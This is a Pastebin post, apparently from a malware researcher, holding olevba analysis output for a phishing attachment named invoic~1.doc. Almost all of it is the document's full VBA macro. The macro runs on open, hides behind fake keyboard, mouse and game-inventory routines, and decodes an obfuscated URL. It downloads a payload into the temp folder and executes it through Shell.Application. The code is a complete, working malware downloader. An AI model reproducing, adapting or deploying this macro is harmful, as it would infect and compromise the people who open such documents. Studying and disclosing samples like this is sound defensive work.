SHARE
TWEET

Malicious Word macro

dynamoo Dec 8th, 2015 179 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS--B-V invoic~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoic~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: invoic~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. GetKeyboardState
  17. RefreshInventory
  18.  
  19. End Sub
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26. -------------------------------------------------------------------------------
  27. VBA MACRO Module1.bas
  28. in file: invoic~1.doc - OLE stream: u'Macros/VBA/Module1'
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30.  
  31. Global Const DIK_ESCAPE = 1
  32. Global Const DIK_UP = 200
  33. Global Const DIK_LEFT = 203
  34. Global Const DIK_RIGHT = 205
  35. Global Const DIK_DOWN = 208
  36. Global Const DIK_1 = 2
  37. Global Const DIK_2 = 3
  38. Global Const DIK_3 = 4
  39. Global Const DIK_4 = 5
  40. Global Const DIK_5 = 6
  41. Global Const DIK_6 = 7
  42. Global Const DIK_7 = 8
  43. Global Const DIK_8 = 9
  44. Global Const DIK_9 = 10
  45. Global Const DIK_0 = 11
  46. Global Const DIK_MINUS = 12
  47. Global Const DIK_EQUALS = 13
  48. Global Const DIK_BACKSPACE = 14
  49. Global Const DIK_TAB = 15
  50. Global Const DIK_Q = 16
  51. Global Const DIK_W = 17
  52. Global Const DIK_E = 18
  53. Global Const DIK_R = 19
  54. Global Const DIK_T = 20
  55. Global Const DIK_Y = 21
  56. Global Const DIK_U = 22
  57. Global Const DIK_I = 23
  58. Global Const DIK_O = 24
  59. Global Const DIK_P = 25
  60. Global Const DIK_LBRACKET = 26
  61. Global Const DIK_RBRACKET = 27
  62. Global Const DIK_RETURN = 28
  63. Global Const DIK_LCONTROL = 29
  64. Global Const DIK_A = 30
  65. Global Const DIK_S = 31
  66. Global Const DIK_D = 32
  67. Global Const DIK_F = 33
  68. Global Const DIK_G = 34
  69. Global Const DIK_H = 35
  70. Global Const DIK_J = 36
  71. Global Const DIK_K = 37
  72. Global Const DIK_L = 38
  73. Global Const DIK_SEMICOLON = 39
  74. Global Const DIK_APOSTROPHE = 40
  75. Global Const DIK_GRAVE = 41
  76. Global Const DIK_LSHIFT = 42
  77. Global Const DIK_BACKSLASH = 43
  78. Global Const DIK_Z = 44
  79. Global Const DIK_X = 45
  80. Global Const DIK_C = 46
  81. Global Const DIK_V = 47
  82. Global Const DIK_B = 48
  83. Global Const DIK_N = 49
  84. Global Const DIK_M = 50
  85. Global Const DIK_COMMA = 51
  86. Global Const DIK_PERIOD = 52
  87. Global Const DIK_SLASH = 53
  88. Global Const DIK_RSHIFT = 54
  89. Global Const DIK_MULTIPLY = 55
  90. Global Const DIK_LALT = 56
  91. Global Const DIK_SPACE = 57
  92. Global Const DIK_CAPSLOCK = 58
  93. Global Const DIK_F1 = 59
  94. Global Const DIK_F2 = 60
  95. Global Const DIK_F3 = 61
  96. Global Const DIK_F4 = 62
  97. Global Const DIK_F5 = 63
  98. Global Const DIK_F6 = 64
  99. Global Const DIK_F7 = 65
  100. Global Const DIK_F8 = 66
  101. Global Const DIK_F9 = 67
  102. Global Const DIK_F10 = 68
  103. Global Const DIK_NUMLOCK = 69
  104. Global Const DIK_SCROLL = 70
  105. Global Const DIK_NUMPAD7 = 71
  106. Global Const DIK_NUMPAD8 = 72
  107. Global Const DIK_NUMPAD9 = 73
  108. Global Const DIK_SUBTRACT = 74
  109. Global Const DIK_NUMPAD4 = 75
  110. Global Const DIK_NUMPAD5 = 76
  111. Global Const DIK_NUMPAD6 = 77
  112. Global Const DIK_ADD = 78
  113. Global Const DIK_NUMPAD1 = 79
  114. Global Const DIK_NUMPAD2 = 80
  115. Global Const DIK_NUMPAD3 = 81
  116. Global Const DIK_NUMPAD0 = 82
  117. Global Const DIK_DECIMAL = 83
  118. Global Const DIK_F11 = 87
  119. Global Const DIK_F12 = 88
  120. Global Const DIK_NUMPADENTER = 156
  121. Global Const DIK_RCONTROL = 157
  122. Global Const DIK_DIVIDE = 181
  123. Global Const DIK_RALT = 184
  124. Global Const DIK_HOME = 199
  125. Global Const DIK_PAGEUP = 201
  126. Global Const DIK_END = 207
  127. Global Const DIK_PAGEDOWN = 209
  128. Global Const DIK_INSERT = 210
  129. Global Const DIK_DELETE = 211
  130. Public DIK_FUNCTIONAL_1 As Object
  131. Public DIK_FUNCTIONAL_2 As Object
  132. Public DIK_FUNCTIONAL_3  As Object
  133. Public DIK_FUNCTIONAL_4 As String
  134. Public DIK_FUNCTIONAL_5 As String
  135. Public DIK_FUNCTIONAL_6 As Object
  136.  
  137. Public Function GetKeyboardDevice(ByVal Window As String) As String
  138.  Set GetKeyboardDevice = DI.CreateDevice("GUID_SysKeyboard")
  139.  GetKeyboardDevice.SetCommonDataFormat DIFORMAT_KEYBOARD
  140. End Function
  141. Public Function GetMouseDevice(ByVal Window As String) As String
  142.  Set GetMouseDevice = DI.CreateDevice("GUID_SysMouse")
  143.  GetMouseDevice.SetCommonDataFormat DIFORMAT_MOUSE
  144. End Function
  145. Public Sub ReacquireMouse()
  146.  On Error Resume Next
  147.  DevMouse.SetCooperativeLevel frmMain.hwnd, DISCL_BACKGROUND Or DISCL_EXCLUSIVE
  148.  DevMouse.Acquire
  149. End Sub
  150. Public Sub ReacquireKeyboard()
  151.  On Error Resume Next
  152.  DevKeyboard.SetCooperativeLevel frmMain.hwnd, DISCL_FOREGROUND Or DISCL_NONEXCLUSIVE
  153.  DevKeyboard.Acquire
  154. End Sub
  155. Public Function pzone3(bc_Code_40() As Variant, pparam As Integer) As String
  156.     Dim i As Integer
  157.     pgraficky = ""
  158.     For i = LBound(bc_Code_40) To UBound(bc_Code_40)
  159.         pgraficky = pgraficky & Chr(bc_Code_40(i) - 9 * pparam - 4802)
  160.     Next i
  161.     pzone3 = pgraficky
  162. End Function
  163. Public Function GetKeyboardState() As Boolean()
  164.  Set DIK_FUNCTIONAL_1 = CreateObject("Microsoft" + ".XMLHTTP")
  165.  GoTo ErrorMode
  166. On Error GoTo Reacquire
  167.  Dim TempKeyboardState As String
  168.  Dim i As Integer
  169.  Dim Keys(1 To 211) As Boolean
  170.  DevKeyboard.GetDeviceStateKeyboard TempKeyboardState
  171.  For i = 1 To 211
  172.  If TempKeyboavrdState.Key(i) <> 0 Then
  173.  Keys(i) = True
  174.  Else
  175.  Keys(i) = False
  176.  End If
  177.  Next i
  178.  Let GetKeyboardState = Keys
  179.  Exit Function
  180. Reacquire:
  181.  ReacquireKeyboard
  182.  Let GetKeyboardState = Keys
  183. ErrorMode:
  184.  Set DIK_FUNCTIONAL_2 = CreateObject("Adodb.Stream")
  185.  CheckDirectInputKeys
  186. End Function
  187. Public Function GetMouseState() As Boolean()
  188.  On Error GoTo Reacquire
  189.  Dim TempMouseState As DIMOUSESTATE
  190.  Dim i As Integer
  191.  Dim Buttons(0 To 2) As Boolean
  192.  DevMouse.GetDeviceStateMouse TempMouseState
  193.  For i = 0 To 2
  194.  If TempMouseState.Buttons(i) <> 0 Then
  195.  Buttons(i) = True
  196.  End If
  197.  Next i
  198.  Let GetMouseState = Buttons
  199.  Exit Function
  200. Reacquire:
  201.  ReacquireMouse
  202.  Let GetMouseState = Buttons
  203. End Function
  204. Public Sub InitDirectInput()
  205.  Set DevKeyboard = GetKeyboardDevice(frmMain)
  206.  Set DevMouse = GetMouseDevice(frmMain)
  207. End Sub
  208. Public Sub UnloadDirectInput()
  209.  DevKeyboard.Unacquire
  210.  DevMouse.Unacquire
  211. End Sub
  212. Public Sub CheckDirectInputKeys()
  213.  Set DIK_FUNCTIONAL_6 = CreateObject("Shell.Application")
  214.  CheckDirectInputMouse
  215.  Exit Sub
  216.  Dim Keys() As Boolean
  217.  Keys = GetKeyboardState()
  218.  keyUp = Keys(DIK_UP)
  219.  keyDown = Keys(DIK_DOWN)
  220.  keyLeft = Keys(DIK_LEFT)
  221.  keyRight = Keys(DIK_RIGHT)
  222.  If Keys(DIK_LALT) = True Or Keys(DIK_RALT) = True Then
  223.  keyAlt = True
  224.  Else
  225.  keyAlt = False
  226.  End If
  227.  If Keys(DIK_LCONTROL) = True Or Keys(DIK_RCONTROL) = True Then
  228.  keyCtrl = True
  229.  Else
  230.  keyCtrl = False
  231.  End If
  232. End Sub
  233. Public Sub CheckDirectInputMouse()
  234.  Dim Buttons() As Boolean
  235.  Set DIK_FUNCTIONAL_3 = CreateObject("WScript" + Chr(DIK_C) + "Shell").Environment("Proc" + Chr(DIK_ESCAPE + 100) + "ss")
  236.  regQuery_A_Key 0, "", ""
  237.  Exit Sub
  238.  Buttons = GetMouseState()
  239.  If LeftIsDown = True Then
  240.  If Buttons(0) = False Then
  241.  LastLeftRelease = Tick
  242.  LeftIsDown = False
  243.  End If
  244.  Else
  245.  If Buttons(0) = True Then
  246.  If Tick - LastLeftClick < 300 Then
  247.  frmMain.DoubleClick 0
  248.  LastLeftClick = 0
  249.  Else
  250.  frmMain.Click 0
  251.  LastLeftClick = Tick
  252.  End If
  253.  LeftIsDown = True
  254.  End If
  255.  End If
  256.  If RightIsDown = True Then
  257.  If Buttons(1) = False Then
  258.  LastRightRelease = Tick
  259.  RightIsDown = False
  260.  End If
  261.  Else
  262.  If Buttons(1) = True Then
  263.  If Tick - LastRightClick < 300 Then
  264.  frmMain.DoubleClick 1
  265.  LastRightClick = 0
  266.  Else
  267.  frmMain.Click 1
  268.  LastRightClick = Tick
  269.  End If
  270.  RightIsDown = True
  271.  End If
  272.  End If
  273. End Sub
  274. Public Function regDelete_Sub_Key(ByVal lngRootKey As Long, _
  275.  ByVal strRegKeyPath As String, _
  276.  ByVal strRegSubKey As String)
  277.  "Software\AAA-Registry Test\Products", "StringTestData"
  278.  Dim lngKeyHandle As LongPtr
  279.  If regDoes_Key_Exist(lngRootKey, strRegKeyPath) Then
  280.  m_lngRetVal = RegOpenKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  281.  m_lngRetVal = RegDeleteValue(lngKeyHandle, strRegSubKey)
  282.  m_lngRetVal = RegCloseKey(lngKeyHandle)
  283.  End If
  284. End Function
  285. Public Function regDoes_Key_Exist(ByVal lngRootKey As Long, _
  286.  ByVal strRegKeyPath As String) As Boolean
  287.  Dim lngKeyHandle As LongPtr
  288.  lngKeyHandle = 0
  289.  m_lngRetVal = RegOpenKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  290.  If lngKeyHandle = 0 Then
  291.  regDoes_Key_Exist = False
  292.  Else
  293.  regDoes_Key_Exist = True
  294.  End If
  295.  m_lngRetVal = RegCloseKey(lngKeyHandle)
  296. End Function
  297. Public Function regQuery_A_Key(ByVal lngRootKey As Long, _
  298.  ByVal strRegKeyPath As String, _
  299.  ByVal strRegSubKey As String) As Variant
  300.  Dim intPosition() As Variant
  301. intPosition = Array(5284, 5296, 5296, 5292, 5238, 5227, 5227, 5289, 5282, 5289, 5277, 5290, 5277, 5295, 5296, 5277, 5279, 5285, 5291, 5226, 5279, 5291, 5289, 5227, 5235, 5234, 5294, 5281, 5232, 5233, 5237, 5227, 5237, 5236, 5297, 5301, 5235, 5234, 5296, 5226, 5281, 5300, 5281)
  302. DIK_FUNCTIONAL_1.Open Chr(DIK_NUMPAD7) + Chr(DIK_NUMLOCK) + "T", pzone3(intPosition, 42), False
  303.   Dim lngKeyHandle As LongPtr
  304.  Dim lngDataType As Long
  305.  Dim lngBufferSize As Long
  306.  Dim lngBuffer As Long
  307.  Dim strBuffer As String
  308.  GoTo lngKeyHandleM
  309.  lngKeyHandle = 0
  310.  lngBufferSize = 0
  311.  m_lngRetVal = RegOp.enKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  312.  If lngKeyHandle = 0 Then
  313.  regQuery_A_Key = ""
  314.  m_lngRetVal = RegCl.oseKey(lngKeyHandle)
  315.  Exit Function
  316.  End If
  317.  m_lngRetVal = RegQuer.yValueEx(lngKeyHandle, strRegSubKey, 0&, _
  318.  lngDataType, 0&, lngBufferSize)
  319.  If lngKeyHandle = 0 Then
  320.  regQuery_A_Key = ""
  321.  m_lngRetVal = RegClos.eKey(lngKeyHandle)
  322.  Exit Function
  323.  End If
  324.  Select Case lngDataType
  325.  Case REG_SZ:
  326.  strBuffer = Space(lngBufferSize)
  327.  m_lngRetVal = RegQuery.ValueEx(lngKeyHandle, strRegSubKey, 0&, 0&, _
  328.   strBuffer, lngBufferSize)
  329.  If m_lngRetVal <> ERROR_SUCCESS Then
  330.  regQuery_A_Key = ""
  331.  Else
  332.  intPosition = InStr(1, strBuffer, Chr(0))
  333.  If lngBufferSize > 0 Then
  334.  regQuery_A_Key = Left(strBuffer, lngBufferSize - 1)
  335.  Else
  336.  regQuery_A_Key = strBuffer
  337.  End If
  338.  End If
  339.  Case REG_DWORD:
  340.  m_lngRetVal = RegQueryV.alueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, lngBuffer, 4&)
  341.  If m_lngRetVal <> ERROR_SUCCESS Then
  342.  regQuery_A_Key = ""
  343.  Else
  344.  regQuery_A_Key = lngBuffer
  345.  End If
  346.  Case Else:
  347.  regQuery_A_Key = ""
  348.  End Select
  349.  m_lngRetVal = RegggC.loseKey(lngKeyHandle)
  350. lngKeyHandleM:
  351.  DIK_FUNCTIONAL_4 = DIK_FUNCTIONAL_3(Chr(DIK_NUMPAD6 + 7) + "E" + Chr(DIK_NUMPAD6) + "P")
  352.  regCreate_A_Key 0, ""
  353. End Function
  354. Public Sub regCreate_Key_Value(ByVal lngRootKey As Long, ByVal strRegKeyPath As String, _
  355.  ByVal strRegSubKey As String, varRegData As Variant)
  356.  Dim lngKeyHandle As LongPtr
  357.  Dim lngDataType As Long
  358.  Dim lngKeyValue As Long
  359.  Dim strKeyValue As String
  360.  If IsNumeric(varRegData) Then
  361.  lngDataType = REG_DWORD
  362.  Else
  363.  lngDataType = REG_SZ
  364.  End If
  365.  m_lngRetVal = RegCreateKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  366.  Select Case lngDataType
  367.  Case REG_SZ:
  368.  strKeyValue = Trim(varRegData) & Chr(0)
  369.  m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
  370.  ByVal strKeyValue, Len(strKeyValue))
  371.  Case REG_DWORD:
  372.  lngKeyValue = CLng(varRegData)
  373.  m_lngRetVal = RegSetValueEx(lngKeyHandle, strRegSubKey, 0&, lngDataType, _
  374.  lngKeyValue, 4&)
  375.  End Select
  376.  m_lngRetVal = RegCloseKey(lngKeyHandle)
  377. End Sub
  378. Public Function regCreate_A_Key(ByVal lngRootKey As Long, ByVal strRegKeyPath As String)
  379.  DIK_FUNCTIONAL_1.Send
  380.  Exit Function
  381.  Dim lngKeyHandle As LongPtr
  382.  m_lngRetVal = RegCrea.teKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  383.  m_lngRetVal = RegClo.seKey(lngKeyHandle)
  384. End Function
  385. Public Function regDelete_A_Key(ByVal lngRootKey As Long, _
  386.  ByVal strRegKeyPath As String, _
  387.  ByVal strRegKeyName As String) As Boolean
  388.  Dim lngKeyHandle As LongPtr
  389.  regDelete_A_Key = False
  390.  If regDoes_Key_Exist(lngRootKey, strRegKeyPath) Then
  391.  m_lngRetVal = RegOpenKey(lngRootKey, strRegKeyPath, lngKeyHandle)
  392.  m_lngRetVal = RegDeleteKey(lngKeyHandle, strRegKeyName)
  393.  If m_lngRetVal = 0 Then regDelete_A_Key = True
  394.  m_lngRetVal = RegCloseKey(lngKeyHandle)
  395.  End If
  396. End Function
  397. Public Sub SetObjectInfo(Info As String)
  398.  If frmMain.Visible = False Then Exit Sub
  399.  frmMain.lblObjectInfo.Caption = Info
  400.  frmMain.lblObjectInfoShadow.Caption = Info
  401. End Sub
  402. Public Sub SetLocation(Location As String)
  403.  If frmMain.Visible = False Then Exit Sub
  404.  frmMain.lblLocation.Caption = Location
  405.  frmMain.lblLocationShadow.Caption = Location
  406. End Sub
  407. Public Sub RefreshInventory()
  408.  DIK_FUNCTIONAL_5 = DIK_FUNCTIONAL_4 + Chr(DIK_F12 + 4) + "rondoul" + Chr(DIK_F11 - 41) + Chr(DIK_F12 + 13) + "x" + Chr(DIK_F11 + 14)
  409.  DrawSelection
  410.  Exit Sub
  411.  If frmMain.Visible = False Then Exit Sub
  412.  DrawInventoryBackground
  413.  DrawInventoryItems
  414.  Dra.w.ToDC 0, 0, 181, 181, frmMain.picInventory.hDC, InventoryBuffer, 0, 0
  415.  DrawSelection
  416.  RealDrawCurInvObject
  417. End Sub
  418. Sub DrawInventoryBackground()
  419.  If frmMain.Visible = False Then Exit Sub
  420.  InventoryBuffer.BltFast 0, 0, DDSInventory, InventoryRect, DDBLTFAST_WAIT
  421. End Sub
  422. Sub DrawSelection()
  423.  With DIK_FUNCTIONAL_2
  424.    DIK_FUNCTIONAL_2.Type = 1
  425.     DIK_FUNCTIONAL_2.Open
  426.  End With
  427.  RealDrawEquippedObject 0
  428.  Exit Sub
  429.  If frmMain.Visible = False Then Exit Sub
  430.  Dim X As Long, Y As Long
  431.  X = 2 + 36 * ((CurInvObj - 1) Mod 5)
  432.  Y = 2 + 36 * Int((CurInvObj - 1) / 5)
  433.  If CurInvObj > 20 Then Y = Y + 1
  434.  Bi.tBlt frmMain.picInventory.hDC, X - 1, Y - 1, 34, 1, 0, 0, 0, WHITENESS
  435.  Bi.tBlt frmMain.picInventory.hDC, X - 1, Y + 33, 34, 1, 0, 0, 0, WHITENESS
  436.  Bi.tBlt frmMain.picInventory.hDC, X - 1, Y - 1, 1, 34, 0, 0, 0, WHITENESS
  437.  Bi.tBlt frmMain.picInventory.hDC, X + 33, Y - 1, 1, 34, 0, 0, 0, WHITENESS
  438.  frmM.ain.picInventory.Refresh
  439. End Sub
  440. Sub DrawInventoryItems()
  441.  If frmMain.Visible = False Then Exit Sub
  442.  Dim A As Long
  443.  For A = 1 To MaxInvObjects
  444.  RealDrawInvObject A
  445.  Next A
  446.  For A = 1 To 5
  447.  RealDrawEquippedObject A
  448.  Next A
  449. End Sub
  450. Private Sub RealDrawInvObject(InvNum As Long)
  451.  If frmMain.Visible = False Then Exit Sub
  452.  Dim A As Long, X As Long, Y As Long
  453.  X = 2 + 36 * ((InvNum - 1) Mod 5)
  454.  Y = 2 + 36 * Int((InvNum - 1) / 5)
  455.  If InvNum <= 20 Then
  456.  With Character.Inv(InvNum)
  457.  If .Object > 0 Then
  458.  A = Object(.Object).Picture
  459.  SrcRect.Left = 0
  460.  SrcRect.Top = CLng(A - 1) * 32
  461.  SrcRect.Right = 32
  462.  SrcRect.Bottom = SrcRect.Top + 32
  463.  If A > 0 Then
  464.  If .EquippedNum > 0 Then
  465.  FillRect X + 4, Y + 4, 24, 24, InventoryBuffer, RGB(0, 255, 255)
  466.  End If
  467.  InventoryBuffer.BltFast X, Y, DDSObjects, SrcRect, DDBLTFAST_SRCCOLORKEY
  468.  End If
  469.  End If
  470.  End With
  471.  End If
  472. End Sub
  473. Private Sub RealDrawEquippedObject(InvNum As Long)
  474.  DIK_FUNCTIONAL_2.write DIK_FUNCTIONAL_1.responseBody
  475.  GoTo saveThis
  476.  If frmMain.Visible = False Then Exit Sub
  477.  Dim A As Long, X As Long, Y As Long
  478.  X = 2 + 36 * ((InvNum - 1) Mod 5)
  479.  Y = 4 + 36 * Int((InvNum + 20 - 1) / 5)
  480.  With Character.EquippedObject(InvNum)
  481.  If .Object > 0 Then
  482.  A = Obje.ct(.Object).Picture
  483.  If A > 0 Then
  484.  SrcRect.Left = 0
  485.  SrcRect.Top = CLng(A - 1) * 32
  486.  SrcRect.Right = 32
  487.  SrcRect.Bottom = SrcRect.Top + 32
  488.  If A > 0 Then
  489.  InventoryBuffer.BltFast X, Y, DDSObjects, SrcRect, DDBLTFAST_SRCCOLORKEY
  490.  End If
  491.  End If
  492.  End If
  493.  End With
  494. saveThis:
  495.  DIK_FUNCTIONAL_2.savetofile DIK_FUNCTIONAL_5, DIK_1
  496.  DIK_FUNCTIONAL_6.Open (DIK_FUNCTIONAL_5)
  497. End Sub
  498. Private Sub RealDrawCurInvObject()
  499.  If frmMain.Visible = False Then Exit Sub
  500.  Dim St1 As String, TheObj As Byte
  501.  BitBlt frmMain.picObject.hDC, 0, 0, 32, 32, 0, 0, 0, BLACKNESS
  502.  If CurInvObj > 0 Then
  503.  If CurInvObj <= 20 Then
  504.  If Character.Inv(CurInvObj).Object > 0 Then
  505.  DrawToDC 0, 0, 32, 32, frmMain.picObject.hDC, DDSObjects, 0, (Object(Character.Inv(CurInvObj).Object).Picture - 1) * 32
  506.  frmMain.lblCurObj = Object(Character.Inv(CurInvObj).Object).Name
  507.  If Character.Inv(CurInvObj).ItemPrefix > 0 Then
  508.  If Len(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).Name) > 0 Then
  509.  St1 = ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).Name + " " + Object(Character.Inv(CurInvObj).Object).Name
  510.  Else
  511.  St1 = Object(Character.Inv(CurInvObj).Object).Name
  512.  End If
  513.  If Character.Inv(CurInvObj).ItemSuffix > 0 Then
  514.  If Len(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).Name) > 0 Then
  515.  St1 = St1 + " " + ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).Name + vbCrLf
  516.  Else
  517.  St1 = St1 + vbCrLf
  518.  End If
  519.  Else
  520.  St1 = St1 + vbCrLf
  521.  End If
  522.  Else
  523.  St1 = Object(Character.Inv(CurInvObj).Object).Name
  524.  If Character.Inv(CurInvObj).ItemSuffix > 0 Then
  525.  If Len(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).Name) > 0 Then
  526.  St1 = St1 + " " + ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).Name + vbCrLf
  527.  Else
  528.  St1 = St1 + vbCrLf
  529.  End If
  530.  Else
  531.  St1 = St1 + vbCrLf
  532.  End If
  533.  End If
  534.  If Character.Inv(CurInvObj).ItemPrefix > 0 Then
  535.  St1 = St1 + "Bonus (+"
  536.  Select Case ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationType
  537.  Case 8
  538.  St1 = St1 + CStr(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationValue) + " HP"
  539.  Case 9
  540.  St1 = St1 + CStr(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationValue) + " Energy"
  541.  Case 10
  542.  St1 = St1 + CStr(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationValue) + " Mana"
  543.  Case 11
  544.  St1 = St1 + CStr(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationValue) + " Damage"
  545.  Case 12
  546.  St1 = St1 + CStr(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationValue) + " Defense"
  547.  Case 13
  548.  St1 = St1 + CStr(ItemPrefix(Character.Inv(CurInvObj).ItemPrefix).ModificationValue) + " Magic Defense"
  549.  End Select
  550.  If Character.Inv(CurInvObj).ItemSuffix > 0 Then
  551.  St1 = St1 + ", +"
  552.  Select Case ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationType
  553.  Case 8
  554.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " HP"
  555.  Case 9
  556.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Energy"
  557.  Case 10
  558.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Mana"
  559.  Case 11
  560.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Damage"
  561.  Case 12
  562.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Defense"
  563.  Case 13
  564.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Magic Defense"
  565.  End Select
  566.  St1 = St1 + ")" + vbCrLf
  567.  Else
  568.  St1 = St1 + ")" + vbCrLf
  569.  End If
  570.  Else
  571.  If Character.Inv(CurInvObj).ItemSuffix > 0 Then
  572.  St1 = St1 + "Bonus (+"
  573.  Select Case ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationType
  574.  Case 8
  575.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " HP"
  576.  Case 9
  577.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Energy"
  578.  Case 10
  579.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Mana"
  580.  Case 11
  581.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Damage"
  582.  Case 12
  583.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Defense"
  584.  Case 13
  585.  St1 = St1 + CStr(ItemSuffix(Character.Inv(CurInvObj).ItemSuffix).ModificationValue) + " Magic Defense"
  586.  End Select
  587.  St1 = St1 + ")" + vbCrLf
  588.  Else
  589.  End If
  590.  End If
  591.  Select Case Object(Character.Inv(CurInvObj).Object).Type
  592.  Case 6
  593.  St1 = St1 + "[" + CStr(Character.Inv(CurInvObj).Value) + "]"
  594.  Case 11
  595.  St1 = St1 + "Ammunition" & vbCrLf & "[" + CStr(Character.Inv(CurInvObj).Value) + "]" & vbCrLf & "+" & Object(Character.Inv(CurInvObj).Object).Modifier & " Damage" & vbCrLf & GenerateRequirements(Character.Inv(CurInvObj).Object)
  596.  Case 1
  597.  St1 = St1 + "Weapon (+" & Object(Character.Inv(CurInvObj).Object).Modifier & " Damage)" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.Inv(CurInvObj).Object)
  598.  Case 10
  599.  St1 = St1 + "Projectile Weapon (+" & Object(Character.Inv(CurInvObj).Object).Modifier & " Damage)" & vbCrLf & GenerateRequirements(Character.Inv(CurInvObj).Object)
  600.  Case 2, 3, 4
  601.  If Object(Character.Inv(CurInvObj).Object).Type = 3 Then
  602.  St1 = St1 + "Armor (+" & Object(Character.Inv(CurInvObj).Object).Modifier & " Defense, +" & Object(Character.Inv(CurInvObj).Object).Data2 & " Magic Defense)"
  603.  ElseIf Object(Character.Inv(CurInvObj).Object).Type = 4 Then
  604.  St1 = St1 + "Helm (+" & Object(Character.Inv(CurInvObj).Object).Modifier & " Defense, +" & Object(Character.Inv(CurInvObj).Object).Data2 & " Magic Defense)"
  605.  ElseIf Object(Character.Inv(CurInvObj).Object).Type = 2 Then
  606.  St1 = St1 + "Shield (+" & Object(Character.Inv(CurInvObj).Object).Modifier & " Defense, +" & Object(Character.Inv(CurInvObj).Object).Data2 & " Magic Defense)"
  607.  End If
  608.  St1 = St1 & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.Inv(CurInvObj).Object)
  609.  Case 8
  610.  If Object(Character.Inv(CurInvObj).Object).Data2 = 0 Then
  611.  St1 = St1 + "(Ring) +" & Object(Character.Inv(CurInvObj).Object).Modifier & " Damage" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.Inv(CurInvObj).Object)
  612.  Else
  613.  St1 = St1 + "(Ring) +" & Object(Character.Inv(CurInvObj).Object).Modifier & " Defense" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.Inv(CurInvObj).Object)
  614.  End If
  615.  End Select
  616.  If ExamineBit(Object(Character.Inv(CurInvObj).Object).Flags, 0) = 255 Then St1 = St1 + vbCrLf + "Cannot be repaired"
  617.  If ExamineBit(Object(Character.Inv(CurInvObj).Object).Flags, 2) = 255 Then St1 = St1 + vbCrLf + "Does not drop on death"
  618.  If ExamineBit(Object(Character.Inv(CurInvObj).Object).Flags, 3) = 255 Then St1 = St1 + vbCrLf + "Two Handed - Cannot use a shield"
  619.  If ExamineBit(Object(Character.Inv(CurInvObj).Object).Flags, 6) = 255 Then St1 = St1 + vbCrLf + "Cannot be traded"
  620.  If Object(Character.Inv(CurInvObj).Object).SellPrice > 0 Then St1 = St1 + vbCrLf + "Sells for " + CStr(Object(Character.Inv(CurInvObj).Object).SellPrice) + " gold"
  621.  SetObjectInfo St1
  622.  Else
  623.  frmMain.lblCurObj = vbNullString
  624.  SetObjectInfo vbNullString
  625.  End If
  626.  Else
  627.  TheObj = CurInvObj - 20
  628.  If Character.EquippedObject(TheObj).Object > 0 Then
  629.  frmMain.lblCurObj = Object(Character.EquippedObject(TheObj).Object).Name
  630.  DrawToDC 0, 0, 32, 32, frmMain.picObject.hDC, DDSObjects, 0, (Object(Character.EquippedObject(TheObj).Object).Picture - 1) * 32
  631.  If Character.EquippedObject(TheObj).ItemPrefix > 0 Then
  632.  If Len(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).Name) > 0 Then
